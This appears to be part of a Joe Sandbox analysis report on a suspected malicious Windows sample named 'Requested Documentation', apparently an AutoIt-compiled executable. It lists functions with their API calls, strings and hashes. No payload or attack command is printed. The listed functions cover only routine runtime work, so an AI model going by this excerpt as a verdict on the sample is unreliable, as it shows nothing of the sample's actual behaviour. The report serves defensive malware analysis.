                                                                              • String ID: %s%u
                                                                              • API String ID: 3744389584-679674701
                                                                              • Opcode ID: d302d533e41201f9bc83bcab0855f403ea6cfcaa25cb6ce560b8a93e56f97aa8
                                                                              • Instruction ID: 43848a03d14fa1671c11777024f4c75b099ebfee76330e6b3a53b66fcf70742b
                                                                              • Opcode Fuzzy Hash: d302d533e41201f9bc83bcab0855f403ea6cfcaa25cb6ce560b8a93e56f97aa8
                                                                              • Instruction Fuzzy Hash: 70A1B071644206EFDB15DF64C884BAAB7ECFF44354F00C52AF999D2290DB30E966CB92
                                                                              Function 009DAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 009DAF18
                                                                              • _wcscmp.LIBCMT ref: 009DAF29
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 009DAF51
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 009DAF6E
                                                                              • _wcscmp.LIBCMT ref: 009DAF8C
                                                                              • _wcsstr.LIBCMT ref: 009DAF9D
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 009DAFD5
                                                                              • _wcscmp.LIBCMT ref: 009DAFE5
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 009DB00C
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 009DB055
                                                                              • _wcscmp.LIBCMT ref: 009DB065
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 009DB08D
                                                                              • GetWindowRect.USER32(00000004,?), ref: 009DB0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: de095f6d08ac5de75e947699193564310757cc52ff65477ba97c1859a228ee6b
                                                                              • Instruction ID: 263baec6cd951e305a79320c61731d907dfe7deca458c1171f08195b002743f0
                                                                              • Opcode Fuzzy Hash: de095f6d08ac5de75e947699193564310757cc52ff65477ba97c1859a228ee6b
                                                                              • Instruction Fuzzy Hash: 8781BF71148209DFDB15DF14C881BAAB7ECEF84314F04C46AFD859A295DB34DD4ACBA2
                                                                              Function 009DABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: db5a091c3b19b3a7f098c55d5b09ee32b9aff65d0b154d61972974e70e7eed27
                                                                              • Instruction ID: 1885951f32a8e7fc7e687fd394afb737548db9adcb6e6508b6ce938f61da97f7
                                                                              • Opcode Fuzzy Hash: db5a091c3b19b3a7f098c55d5b09ee32b9aff65d0b154d61972974e70e7eed27
                                                                              • Instruction Fuzzy Hash: C1319671988209BBDB24FB60DD03FAEB764AF50760F604816F441712D1EF51AF14D692
                                                                              Function 009F4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 009F5013
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 009F501E
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 009F5029
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 009F5034
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 009F503F
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 009F504A
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 009F5055
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 009F5060
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 009F506B
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 009F5076
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 009F5081
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 009F508C
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 009F5097
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 009F50A2
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 009F50AD
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 009F50B8
                                                                              • GetCursorInfo.USER32(?), ref: 009F50C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: f7e5b41d087ce64a685f19ae03a118da8dd349d38752b8bff207c2176ef4d019
                                                                              • Instruction ID: 85fbc7cde905e5bc127d94497eb431c1769eccd500a473c549fb6dced660a956
                                                                              • Opcode Fuzzy Hash: f7e5b41d087ce64a685f19ae03a118da8dd349d38752b8bff207c2176ef4d019
                                                                              • Instruction Fuzzy Hash: F931F6B1D4831D6ADF109FB68C8996EBFECFF04750F54452AE60DE7280DA78A5018F91
                                                                              Function 00A0A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A0A259
                                                                              • DestroyWindow.USER32(?,?), ref: 00A0A2D3
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A0A34D
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A0A36F
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A382
                                                                              • DestroyWindow.USER32(00000000), ref: 00A0A3A4
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A0A3DB
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A3F4
                                                                              • GetDesktopWindow.USER32 ref: 00A0A40D
                                                                              • GetWindowRect.USER32(00000000), ref: 00A0A414
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A0A42C
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A0A444
                                                                                • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 1297703922-3619404913
                                                                              • Opcode ID: 341874a02af07426c1d779bf61bf11c5562bf13463336413fba0c80e21e16e23
                                                                              • Instruction ID: 446e7d37091aa9f40b8c69208b820c9862345a243a890d923d6a333674a6efee
                                                                              • Opcode Fuzzy Hash: 341874a02af07426c1d779bf61bf11c5562bf13463336413fba0c80e21e16e23
                                                                              • Instruction Fuzzy Hash: B6719B78540348AFD721CF68DC48F6A7BE5FB99300F04452CF9869B2A1CB72E902CB52
                                                                              Function 00A0C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00A0C627
                                                                                • Part of subcall function 00A0AB37: ClientToScreen.USER32(?,?), ref: 00A0AB60
                                                                                • Part of subcall function 00A0AB37: GetWindowRect.USER32(?,?), ref: 00A0ABD6
                                                                                • Part of subcall function 00A0AB37: PtInRect.USER32(?,?,00A0C014), ref: 00A0ABE6
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C690
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A0C69B
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A0C6BE
                                                                              • _wcscat.LIBCMT ref: 00A0C6EE
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A0C705
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C71E
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A0C735
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A0C757
                                                                              • DragFinish.SHELL32(?), ref: 00A0C75E
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A0C851
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 169749273-3440237614
                                                                              • Opcode ID: 838167509628d8d17f27d138f93f6b6c22d29f076160c83b3d45fdad35ac4fc6
                                                                              • Instruction ID: b17cdb2e265037bd5514136012447e065a693099004a86a957b47d959823361d
                                                                              • Opcode Fuzzy Hash: 838167509628d8d17f27d138f93f6b6c22d29f076160c83b3d45fdad35ac4fc6
                                                                              • Instruction Fuzzy Hash: 6D617071508305AFC711EFA4DC85E9FBBE8EFC9310F400A1DF595922A1DB71994ACB52
                                                                              Function 00A04392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A04424
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A0446F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 3974292440-4258414348
                                                                              • Opcode ID: 4d659e53545eb7984a4abb4cf2957efdae879b139c703dd8f30ddcea3b809ab7
                                                                              • Instruction ID: 436048461ae1a1284bc72ca554ee0f997300d2fe6fb7b8daef84fae9be3e9735
                                                                              • Opcode Fuzzy Hash: 4d659e53545eb7984a4abb4cf2957efdae879b139c703dd8f30ddcea3b809ab7
                                                                              • Instruction Fuzzy Hash: 479138702047159FCB04EF20D851B6AB7A1BFD9354F08886DF9965B3A2DB31ED4ACB81
                                                                              Function 00A0B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A0B8B4
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A06B11,?), ref: 00A0B910
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0B949
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A0B98C
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0B9C3
                                                                              • FreeLibrary.KERNEL32(?), ref: 00A0B9CF
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A0B9DF
                                                                              • DestroyIcon.USER32(?), ref: 00A0B9EE
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A0BA0B
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A0BA17
                                                                                • Part of subcall function 009A2EFD: __wcsicmp_l.LIBCMT ref: 009A2F86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 1212759294-1154884017
                                                                              • Opcode ID: e567ddf0e3bcad141e7fa60874d85fdc26f0849c73896fad8b2e000cd2b2e087
                                                                              • Instruction ID: c2f186e05ed98436b81405094b7169c98a1edfadfa49ffc879961d0cfaa95932
                                                                              • Opcode Fuzzy Hash: e567ddf0e3bcad141e7fa60874d85fdc26f0849c73896fad8b2e000cd2b2e087
                                                                              • Instruction Fuzzy Hash: 1D61DD71910209BFEB24DF64ED41FBA7BA8EB09710F108519F915E61D0DB74A981DBA0
                                                                              Function 009EDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 009EDCDC
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009EDCEC
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009EDCF8
                                                                              • __wsplitpath.LIBCMT ref: 009EDD56
                                                                              • _wcscat.LIBCMT ref: 009EDD6E
                                                                              • _wcscat.LIBCMT ref: 009EDD80
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDD95
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDA9
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDDB
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDDFC
                                                                              • _wcscpy.LIBCMT ref: 009EDE08
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009EDE47
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3566783562-438819550
                                                                              • Opcode ID: 5f33010d3e7ae47477fa36a8d6b4c82ecde0e6ab5d827ee5e5ebda7db3e6cdd0
                                                                              • Instruction ID: 11b878c88b7a9471b53c772eaef1fd240f9633c3e3a58bf73fc894df03e1d9a1
                                                                              • Opcode Fuzzy Hash: 5f33010d3e7ae47477fa36a8d6b4c82ecde0e6ab5d827ee5e5ebda7db3e6cdd0
                                                                              • Instruction Fuzzy Hash: EB6168725043459FCB10EF61C844AAEB3E8FF89314F04492EF98997251EB31EE45CB92
                                                                              Function 009E9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 009E9C7F
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009E9CA0
                                                                              • __swprintf.LIBCMT ref: 009E9CF9
                                                                              • __swprintf.LIBCMT ref: 009E9D12
                                                                              • _wprintf.LIBCMT ref: 009E9DB9
                                                                              • _wprintf.LIBCMT ref: 009E9DD7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 311963372-3080491070
                                                                              • Opcode ID: 796d6fc71df4731bc072231af9c2cc003376b3a0492efe3f70b010d646c25d9b
                                                                              • Instruction ID: 9cbcc829bda61a7d1508ab87102ee283cfce505b73a882b2b2fd7012bf5cd670
                                                                              • Opcode Fuzzy Hash: 796d6fc71df4731bc072231af9c2cc003376b3a0492efe3f70b010d646c25d9b
                                                                              • Instruction Fuzzy Hash: F5517D71900609ABCB15FBE0DD46EEEB778AF44300F600565F505722A2EB356E59CB60
                                                                              Function 009EA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • CharLowerBuffW.USER32(?,?), ref: 009EA3CB
                                                                              • GetDriveTypeW.KERNEL32 ref: 009EA418
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA460
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA497
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA4C5
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 2698844021-4113822522
                                                                              • Opcode ID: 7015eae283c33bea179a481907706e0abc8cf8319129558e8621ba7b5596bf81
                                                                              • Instruction ID: 37878792f89affe6a88cd0c09c22e8c0456633cd80ec1cfff02e7aa58e3d8626
                                                                              • Opcode Fuzzy Hash: 7015eae283c33bea179a481907706e0abc8cf8319129558e8621ba7b5596bf81
                                                                              • Instruction Fuzzy Hash: 69514D755043059FC700EF11C891A6AB7E8FF94758F14886DF89A973A1DB31EE0ACB92
                                                                              Function 009DF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,009BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 009DF8DF
                                                                              • LoadStringW.USER32(00000000,?,009BE029,00000001), ref: 009DF8E8
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • GetModuleHandleW.KERNEL32(00000000,00A45310,?,00000FFF,?,?,009BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 009DF90A
                                                                              • LoadStringW.USER32(00000000,?,009BE029,00000001), ref: 009DF90D
                                                                              • __swprintf.LIBCMT ref: 009DF95D
                                                                              • __swprintf.LIBCMT ref: 009DF96E
                                                                              • _wprintf.LIBCMT ref: 009DFA17
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009DFA2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 984253442-2268648507
                                                                              • Opcode ID: 708930ad58a5850fe65b69c835fc693afd07c5a6c23aaaa065fa8acefaf74955
                                                                              • Instruction ID: 3d4c667e117dea5623d8e0674efc049161300c9d9becbdbce828384800a87daa
                                                                              • Opcode Fuzzy Hash: 708930ad58a5850fe65b69c835fc693afd07c5a6c23aaaa065fa8acefaf74955
                                                                              • Instruction Fuzzy Hash: B3414072804209AACF14FBE0DD57EEEB778AF94310F600465F506B6291EA35AF49CB61
                                                                              Function 009BA8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                              • String ID:
                                                                              • API String ID: 884005220-0
                                                                              • Opcode ID: 071a3dc13a5c226bd8f29da317e362568538ad574b01a5dff6c39785b5d40c38
                                                                              • Instruction ID: 191dc3deed7341039b0610ae377486d37ac6b56701fe71465aec4bfa802ec561
                                                                              • Opcode Fuzzy Hash: 071a3dc13a5c226bd8f29da317e362568538ad574b01a5dff6c39785b5d40c38
                                                                              • Instruction Fuzzy Hash: 1F613976500305AFDF209F68DE017EA77A8EF82371F214615E815AB1D1EB39DD41CBA2
